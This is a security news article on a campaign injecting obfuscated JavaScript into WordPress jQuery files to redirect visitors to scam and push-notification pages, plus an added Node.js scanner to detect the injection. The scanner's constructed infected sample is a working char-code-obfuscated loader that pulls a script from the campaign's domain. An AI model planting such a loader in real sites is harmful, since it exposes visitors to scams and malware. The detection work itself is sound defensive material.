Thousands of WordPress Sites Compromised and Redirecting Users to Scam Pages
Researchers from Sucuri have discovered a large-scale campaign in which hackers are injecting malicious JavaScript code into compromised WordPress sites. These infected sites are then used to redirect visitors to scam pages and various malicious websites. According to experts, more than 6,600 sites have already been affected by this campaign.
The malicious code is injected into various files on hacked sites, including the database and core WordPress files such as ./wp-includes/js/jquery/jquery.min.js and ./wp-includes/js/jquery/jquery-migrate.min.js. Essentially, attackers try to place their code in any .js file with "jQuery" in its name. To evade detection and hide their activity, the attackers use CharCode obfuscation: the strings in the payload are stored as sequences of numeric character codes (decoded at runtime with String.fromCharCode), so neither the injected domain names nor the script-loading calls appear in plain text in the file.
How the Redirects Work
Typically, these redirects lead to phishing pages, malware downloads, or ad banners, or simply generate further redirects. For example, the injected code on a compromised site creates a new script element whose source is the domain legendtable[.]com. That domain then contacts a second external domain, local[.]drakefollow[.]com, which in turn contacts another, forming a chain that the visitor passes through before finally landing on a malicious resource.
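As an added example (not Sucuri's tooling and not code from the original report), the Node.js script below shows how an operator could check the jQuery files named above for the injection and first-hop loader described in the two preceding sections: it decodes String.fromCharCode() calls whose arguments are all numeric literals, extracts the hostnames that appear in the decoded text, and flags files that combine that obfuscation with a script-loading construct and an external host. The infected sample is a constructed imitation of the described loader (the page does not reproduce the real injected code); the site's own host example.com, the variable name _0x and the path fetched from legendtable[.]com are assumptions; and the clean sample is a stand-in for a genuine jquery.min.js, not the real file.

```javascript
// Added example, not part of the original report or of Sucuri's tools.
// Assumptions: the site's own host is "example.com"; both samples below are
// constructed, and only imitate the behaviour the article describes.

// Only String.fromCharCode calls whose arguments are ALL numeric literals
// (decimal or hex) are decoded. Genuine jQuery also calls String.fromCharCode,
// but with computed arguments (Sizzle's CSS-unescape helper), so restricting
// the match to literal arguments keeps false positives down.
const CHARCODE_CALL =
  /String\.fromCharCode\(\s*((?:0x[0-9a-f]+|\d+)(?:\s*,\s*(?:0x[0-9a-f]+|\d+))*)\s*\)/gi;

// Replace each literal-argument call with the string it would produce, as a
// JSON string literal, so the result is still readable JavaScript.
function decodeCharCode(source) {
  return source.replace(CHARCODE_CALL, (_, args) => {
    const codes = args.split(",").map((n) => Number(n.trim()));
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Hostnames of any http(s) URLs present in the (decoded) text.
const URL_HOST = /https?:\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;

function extractHosts(text) {
  const hosts = new Set();
  for (const m of text.matchAll(URL_HOST)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Constructs that load or write a script. Note that legitimate jQuery contains
// createElement("script") too (its DOMEval helper), so this is not conclusive
// on its own; it is combined with the other two signals below.
const SCRIPT_LOADER =
  /createElement\(\s*["']script["']\s*\)|document\.write|\.src\s*=|\[\s*"src"\s*\]\s*=/i;

// Scan one jQuery-named file. A file is reported as suspicious only when it
// (a) contained literal CharCode obfuscation, (b) loads a script, and
// (c) references a host other than the site's own.
function scanJqueryFile(fileName, contents, ownHost) {
  const decoded = decodeCharCode(contents);
  const hadObfuscation = decoded !== contents;
  const externalHosts = extractHosts(decoded).filter(
    (h) => h !== ownHost && !h.endsWith("." + ownHost)
  );
  const loadsScript = SCRIPT_LOADER.test(decoded);
  const suspicious = hadObfuscation && loadsScript && externalHosts.length > 0;
  return { fileName, hadObfuscation, loadsScript, externalHosts, suspicious, decoded };
}

// Walk a WordPress tree (e.g. wp-includes) and scan every .js file whose name
// contains "jquery", the files this campaign targets. The modules are loaded
// lazily so the pure functions above work without filesystem access.
function scanDirectory(root, ownHost) {
  const fs = require("fs");
  const path = require("path");
  const findings = [];
  const walk = (dir) => {
    for (const entry of fs.readdirSync(dir, { withFileTypes: true })) {
      const full = path.join(dir, entry.name);
      if (entry.isDirectory()) walk(full);
      else if (/jquery/i.test(entry.name) && entry.name.endsWith(".js"))
        findings.push(scanJqueryFile(full, fs.readFileSync(full, "utf8"), ownHost));
    }
  };
  walk(root);
  return findings.filter((f) => f.suspicious || f.hadObfuscation);
}

// Constructed sample (assumption): a legitimate-looking header followed by an
// appended loader that mirrors the described injection, i.e. a script element
// whose src is the first domain of the redirect chain, encoded as char codes.
const SAMPLE_INFECTED =
  "/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */\n" +
  '!function(e,t){"use strict"}(window);\n' +
  "var _0x=document.createElement(String.fromCharCode(115,99,114,105,112,116));" +
  "_0x[String.fromCharCode(115,114,99)]=String.fromCharCode(104,116,116,112,115,58,47,47," +
  "108,101,103,101,110,100,116,97,98,108,101,46,99,111,109,47);" +
  "document.head.appendChild(_0x);";

// Constructed stand-in for an unmodified file (not real jQuery source).
const SAMPLE_CLEAN =
  "/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */\n" +
  '!function(e,t){"use strict"}(window);';
```

Run `scanDirectory("/var/www/html/wp-includes", "example.com")` against a copy of the site; the `decoded` field of each finding is the de-obfuscated text to review by hand, and for the sample above it reads `document.createElement("script")` with `"https://legendtable.com/"` assigned to `src`. Because genuine jQuery uses both String.fromCharCode (with computed arguments) and createElement("script"), neither signal alone is conclusive, which is why the verdict requires all three. A file that trips the check should be compared against a pristine copy from the same WordPress release rather than patched in place, and since the article notes the database is also targeted, the same decoded strings are worth searching for in wp_posts and wp_options as well.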
Before reaching the final destination, some visitors are shown a fake CAPTCHA page that tries to trick them into subscribing to push notifications from a malicious site.
“If a person clicks on the fake CAPTCHA, they will start receiving unwanted ads, even if the site is not open, and the ads will appear as if they are coming from the operating system, not the browser,” experts explain. “Such hidden maneuvers with push notifications are also linked to one of the most common tech support scams, where users are told their computer is infected or running slowly, and are urged to call a toll-free number [controlled by hackers] to resolve the issue.”
How Sites Are Compromised
Researchers say the initial compromise of WordPress sites is achieved by exploiting vulnerabilities in WordPress plugins and themes, of which new ones are disclosed on a regular basis.